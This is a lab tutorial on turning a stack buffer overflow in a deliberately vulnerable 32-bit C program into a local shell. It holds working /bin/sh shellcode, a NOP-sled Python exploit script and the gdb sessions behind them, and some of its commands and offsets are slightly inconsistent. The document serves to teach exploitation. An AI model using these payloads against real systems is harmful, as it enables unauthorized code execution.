Buffer Overflow: Code Execution By Shellcode Injection

— Written by — 11 min read

buffer overflow part 3 banner

By this third article of the Buffer Overflow series we should be familiar with:

  • buffer,
  • memory segmentation,
  • buffer overflow,
  • gdb,
  • assembly and disassembly

In this article we will details how to exploit a buffer overflow in order to achieve remote code execution via shellcode injection.

Setting up our environment

As previously stated in the introduction, today’s memory layout of a running application has become significantly more complex due to the implementation of various security measures. These measures have made exploiting vulnerabilities such as buffer overflow quite challenging. Some of the common and highly effective security measures include for example:

  • ASLR protection (Address Space Layout Randomization) randomly arranges the address space positions of key data areas of a program. At each new execution, the stored data is placed in different memory spaces.
  • SSP protection (Stack-Smashing Protector) detects stack buffer overrun by aborting if a secret value on the stack is changed. These secret values (”Canaries”) are inserted between data segments in the stack. The integrity of the secrets are checked and the program immediately interrupt if modification is detected.
  • No possible Stack or Heap execution, these memory spaces are intended to only contain variables and pointers but never executable code.

For the learning purpose of our example, we are going to disable these protections and force a 32 bits compilation.

1
2
[hg8@archbook ~]$ sudo echo 0 > /proc/sys/kernel/randomize_va_space # disable ASLR
[hg8@archbook ~]$ gcc -m32 -g -mpreferred-stack-boundary=2 -fno-stack-protector -z execstack vuln.c -o vuln

Flags explanation:

-m32: Compile in 32 bits

-g: Generates debug information to be used by GDB debugger.

-mpreferred-stack-boundary=2: Ensure that the stack is set up into 4-bytes increments, preventing optimisation of the stack segmentation that could make our example confusing.

-fno-stack-protector: Disable Stack Smashing protection.

-z execstack: Disable NX (allowing stack segment to be executable).

Overflowing the stack

Let’s now open our program with gdb:

1
2
3
4
5
6
7
8
9
10
11
[hg8@archbook ~]$ gdb ./vuln
Reading symbols from ./vuln...
(gdb) list
1 #include <string.h>
2
3 int main (int argc, char** argv) {
4 char buffer [500];
5 strcpy(buffer, argv[1]);
6 return 0;
7 }
(gdb)

In the previous article, the disassembly of our example program allowed us to understand what our program stack will looks like:

memory segmentation representation

In order to exploit the buffer overflow in our program, we are going to pass an input bigger than 500 characters to our buffer[] variable.

It’s important to note that, even though the stack itself grows upward from high-memory to lower-memory addresses, the buffer itself is filled from lower to higher memory addresses.

In our example, when we input a string longer than 500 characters, it will begin overwriting the register that’s lower on the stack (and higher up in the memory).

For example if we use a 501 characters long input, the following will happen:

memory representation buffer overflow

Well let’s now see in practice what happens when we input a 501 long string to our program.

We can use python to generate a string made of 501 occurrences of the letter ‘A’ (0x41 is hexadecimal for 65, which is the ASCII-code for the letter ‘A’).

From gdb this can be done using the run command:

1
2
3
4
[hg8@archbook ~]$ gdb ./vuln
Reading symbols from vuln...
(gdb) run $(python -c "print('\x41'*501)"
[Inferior 1 (process 3508) exited normally]

Nothing happens, it’s normal since EBX is not a critical register in our example program.

Let’s now add a breakpoint in order to highlight how the EBX register got overwritten with an extra x41 (’A’):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
(gdb) disassemble main
Dump of assembler code for function main:
0x08049176 <+0>: push ebp
0x08049177 <+1>: mov ebp,esp
0x08049179 <+3>: push ebx
0x0804917a <+4>: sub esp,0x1f4
0x08049180 <+10>: call 0x80491ae <__x86.get_pc_thunk.ax>
0x08049185 <+15>: add eax,0x2053
0x0804918a <+20>: mov edx,DWORD PTR [ebp+0xc]
0x0804918d <+23>: add edx,0x4
0x08049190 <+26>: mov edx,DWORD PTR [edx]
0x08049192 <+28>: push edx
0x08049193 <+29>: lea edx,[ebp-0x1f8]
0x08049199 <+35>: push edx
0x0804919a <+36>: mov ebx,eax
0x0804919c <+38>: call 0x8049050 <strcpy@plt>
0x080491a1 <+43>: add esp,0x8
0x080491a4 <+46>: mov eax,0x0
0x080491a9 <+51>: mov ebx,DWORD PTR [ebp-0x4]
0x080491ac <+54>: leave
0x080491ad <+55>: ret
End of assembler dump.
(gdb) break *0x080491ac
Breakpoint 1 at 0x80491ac: file vuln.c, line 7.
(gdb) run $(python -c "print('\x41'*501)")
Starting program: ./vuln $(python -c "print('\x41'*501)")

Breakpoint 1, 0x080491ac in main (argc=2, argv=0xffffd0b4) at vuln.c:7
7 }

Now by checking the registers with the info registers commands we can verify that the ebx address is being overwritten:

1
2
3
4
5

(gdb) info registers
[...]
ebx 0xf7fa0041 -134610879
[..]

By inputting a 504 character long string, we overwrite the whole ebx register:

1
2
3
4
5
6
7
8
9
(gdb) run $(python -c "print('\x41'*504)")                                                                             
Starting program: ./vuln $(python -c "print('\x41'*504)")

Breakpoint 1, 0x080491ac in main (argc=2, argv=0xffffd0b4) at vuln.c:7
7 }
(gdb) info registers
[...]
ebx 0x41414141 -1094795585
[..]

We can also visualize what the stack looks like in memory from gdb with x/12x $sp-20. Let’s decompose the command to understand how it works:

  • x/14x displays 14 bytes of memory in a hexadecimal format.
  • $sp+460 starts the memory reading from the stack pointer ($sp) position offset by +460, which is around where our ebx register is located.

Beforehand let’s slightly tweak our payload to make it more visible on the stack representation, instead of ‘A’ we will replace the 4 overflowed bytes with ‘B’ (x42):

1
2
3
4
5
6
7
8
9
10
(gdb) run $(python -c "print('\x41'*500+'\x42'*4)") 
Starting program: ./vuln $(python -c "print('\x41'*500+'\x42'*4)")

Breakpoint 1, 0x080491ac in main (argc=2, argv=0xffffd0b4) at vuln.c:7
7 }
(gdb) x/14x $sp+460
0xffffcfbc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcfcc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcfdc: 0x41414141 0x41414141 0x42424242 0x00000000
0xffffcfec: 0xf7dad119 0x00000002

Now let’s overwrite every register following our buffer, ebx with ‘BBBB’, ebp with ‘CCCC’ and eip with ‘DDDD’:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
(gdb) run $(python -c "print('\x41'*500+'\x42'*4+'\x43'*4+'\x44'*4)") 

Program received signal SIGSEGV, Segmentation fault.
0x44444444 in ?? ()
(gdb) info registers
[...]
ebx 0x42424242 1111638594
esp 0xffffcff0 0xffffcff0
ebp 0x43434343 0x43434343
esi 0x804b0e0 134525152
edi 0xf7ffcb80 -134231168
eip 0x44444444 0x44444444
[...]
(gdb) (gdb) x/14x $sp+460
0xffffcfbc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcfcc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcfdc: 0x41414141 0x41414141 0x42424242 0x43434343
0xffffcfec: 0x44444444 0x00000000

Our stack now looks like this:

memory buffer overflow payload injection

We achieved full control of adjacent memory registers. So what can we do with such access ? Let’s move on to exploitation.

Exploitation

The last register we manage to overwrite is eip.

The EIP register holds the “Extended Instruction Pointer” for the stack. In other words, it tells the computer where to go next to execute the next command and controls the flow of a program.

This means that if we can input malicious code into the program, we can use the buffer overflow to overwrite the eip register to point to the memory address of the malicious code.

And that’s exactly what we are going to do now, and we will start by crafting a shellcode.

Shellcode Creation

First of all, what is a shellcode ?

A shellcode is a small piece of code used as payload when exploiting an overflow vulnerability. Historically it’s called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine.

In our case, we will inject a shellcode into our buffer in order to have it get executed later on.
Wikipedia defines the writing of shellcode “as much of an art as it is a science”, since shellcode depends on the operating system, CPU architecture and is commonly written in Assembly.

You can easily find plenty on the internet. For our example we are going to use a very common and simple shellcode for x86 which executes a /bin/sh shell.

Here is a quick overview of this shellcode:

1
2
3
4
5
6
7
8
9
10
xor eax, eax      ; put 0 into eax
push eax ; push 4 bytes of null from eax to the stack
push 0x68732f2f ; push "//sh" to the stack
push 0x6e69622f ; push "/bin" to the stack
mov ebx, esp ; put the address of "/bin//sh" to ebx, via esp
push eax ; push 4 bytes of null from eax to the stack
push ebx ; push ebx to the stack
mov ecx, esp ; put the address of ebx to ecx, via esp
mov al, 0xb ; put 11 into eax, since execve() is syscall #11
int 0x80 ; call the kernel to make the syscall happen

This code can be assembled and linked using nasm to create an executable binary program as an Executable and Linking Format (ELF) binary:

1
[hg8@archbook ~]$ nasm -f elf shellcode.asm

Now we need to disassemble it in order to get the shellcodes bytes:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
[hg8@archbook ~]$ objdump -d -M intel shellcode.o

shellcode.o: file format elf32-i386

Disassembly of section .text:

00000000 <.text>:
0: 31 c0 xor eax,eax
2: 50 push eax
3: 68 2f 2f 73 68 push 0x68732f2f
8: 68 2f 62 69 6e push 0x6e69622f
d: 89 e3 mov ebx,esp
f: 50 push eax
10: 53 push ebx
11: 89 e1 mov ecx,esp
13: b0 0b mov al,0xb
15: cd 80 int 0x80

We can now easily extract the hexadecimal shellcode, either by hand or with some bash-fu:

1
2
[hg8@archbook ~]$ objdump -d ./shellcode.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

Shellcode Testing

Now to be sure our shellcode works, let’s write a simple program to run it on our machine:

1
2
3
4
5
6
7
8
#include <stdio.h>
#include <string.h>

int main(){
char shellcode[] = "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
int (*ret)() = (int(*)())shellcode;
return ret();
}

Let’s run it:

1
2
3
[hg8@archbook ~]$ gcc -m32 -z execstack shellcode-loader.c -o shellcode-loader
[hg8@archbook ~]$ ./shellcode-loader
sh-5.1$

All is good, let’s now inject the shellcode into our vulnerable program.

Shellcode Injection

We now need to make our vulnerable program execute our shellcode. To do so we will inject the shellcode in the input data payload, for it to be stored in our buffer.

The next step will be to have our return address point to the memory location where our shellcode is stored in order for it to be executed.

Since memory may change a bit during program execution and we don’t know the exact location of our shellcode we will use the NOP-sled technique.

NOP-sled

NOP Sled

A NOP sled, also known as a NOP slide, is a technique used to help ensure that a shellcode is executed even if the exact memory location of the exploit payload is not known.

The NOP, or No-Operation, instruction is a machine language instruction that performs no operation and takes up one machine cycle. NOP sled takes advantage of this instruction by creating a sequence of NOP instructions that can serve as a landing pad for the program execution flow.

We will craft a sequence of NOP instructions followed by our shellcode. The idea is that if the execution flow is redirected to any point within the NOP sled, the CPU will execute the NOP instructions and keep moving forward until it hits the shellcode.

When utilizing a NOP-sled, the precise location of the shellcode within the buffer doesn’t matter for the return address to reach it. What we do know is that it will reside somewhere within the buffer, and its length will be 25 bytes.

With our shellcode of 25 bytes and a payload of 512 bytes, we have 487 bytes to fill with NOP, which we will divide like so:

Payload: [ NOP SLED] [ SHELLCODE ] [ RETURN ADDRESS ]

Crafting our exploit

We will use a Python script to craft our exploit, since we use Python 3 it’s important to use bytes type.

In addition, since we are working on x86, the hexadecimal value for NOP instructions is 0x90.

1
2
3
4
5
6
7
8
import sys

shellcode = b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
eip = b"\x43\x43\x43\x43" * 10
nop = b"\x90" * 447
buff = nop + shellcode + eip

sys.stdout.buffer.write(buff)

Since we don’t know for now what the return address (eip) will be, we currently replace it with C (x43) that we repeat 10 times to have a bit of padding between our shellcode and the stack.

Our NOP sled is being repeated 447 times since we need to write 512 bytes to overwrite the return address:

1
2
512        - (4 * 10) -     25    =     447
Total size - eip - shellcode = nop sled.

Here is what we expect our memory to looks like after execution of our payload:

Stack Overflowed shellcode injection

Let’s run our payload:

1
2
3
4
5
6
7
[hg8@archbook ~]$ gdb ./vuln
Reading symbols from vuln2-nosec...
(gdb) run $(python exploit-test.py)
Using host libthread_db library "/usr/lib/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()

We get exactly what we were looking for, a segmentation fault since we didn’t provide a valid return address yet. Let’s now inspect our memory to define what the return address should be.

When inspecting the memory, we can see our payload was injected as expected:

buffer overflow memory inspection

Let’s now pick any memory address within the x90 NOP sled area before the shellcode to be our return address. From the screenshot above we can pick 0xffffce30 for example.

Since Intel CPUs are little endian, we need to reverse the address for our payload.

Our script become:

1
2
3
4
5
6
7
8
import sys

shellcode = b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
eip = b"\x30\xce\xff\xff" * 10
nop = b"\x90" * 447
buff = nop + shellcode + eip

sys.stdout.buffer.write(buff)

If everything goes fine, our program strcpy will copy our string, and when it will try to return it will load our injected return value, redirecting to the NOP Sled, followed by the shellcode that will then be executed.

Let’s give it a try:

1
2
3
4
5
6
7
8
[hg8@archbook ~]$ gdb ./vuln
(gdb) run $(python exploit.py)

Using host libthread_db library "/usr/lib/libthread_db.so.1".
process 6722 is executing new program: /usr/bin/bash
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
sh-5.1$

And here we go! The buffer overflow was successfully exploited, resulting in obtaining access to a command shell.

References



Binary Exploitation
, , ,